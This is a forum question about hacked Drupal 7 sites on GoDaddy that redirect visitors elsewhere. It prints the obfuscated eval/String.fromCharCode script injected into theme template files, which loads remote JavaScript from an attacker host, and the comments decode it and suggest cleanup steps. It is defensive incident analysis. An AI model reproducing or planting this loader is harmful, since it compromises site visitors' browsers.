# Drupal Sites Hacked Hosted on Godaddy

Tags: drupal, drupal-7, system, drupal-modules

We have hosted all our sites on Godaddy.com but all of the sites started redirecting to different websites/URLs.

After doing lots of research we found out that a script was added in   `html.tpl.php` and `maintenance-page.tpl.php`. And under system module also on the following pages the script was added:

- `html.tpl.php`
- `maintenance-page.tpl.php`.

This is the script:

```
<script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 122, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 115, 99, 114, 105, 112, 116, 34, 41, 59, 32, 122, 46, 116, 121, 112, 101, 32, 61, 32, 34, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 34, 59, 32, 122, 46, 115, 114, 99, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 106, 115, 46, 108, 111, 99, 97, 108, 115, 116, 111, 114, 97, 103, 101, 46, 116, 107, 47, 115, 46, 106, 115, 63, 99, 114, 116, 61, 110, 101, 119, 34, 59, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 104, 101, 97, 100, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 122, 41, 59));</script>
```

And in `index.php` a variable was added.

Can anyone tell what this script is actually doing?

Comment: yep redirecting to a new URL exactly as you already suspected...document.createElement("script"); z.type = "text/javascript"; z.src = "https://js[dot]localstorage[dot]tk/s[dot]js?crt=new" document.head.appendChild(z);

Comment: They wrote loads of seemingly random numbers, ... but which actually represent malicious lines of code in ascii characters. They then used `String.fromCharCode` to turn the numbers into the string, then `eval`-ed the string to run the malicious code .... clever!

Comment: Dealing the same issue right now. Check the site users and remove alien ones. Also check user roles - some new was created there. Update to latest drupal. Check site root for suspicious files.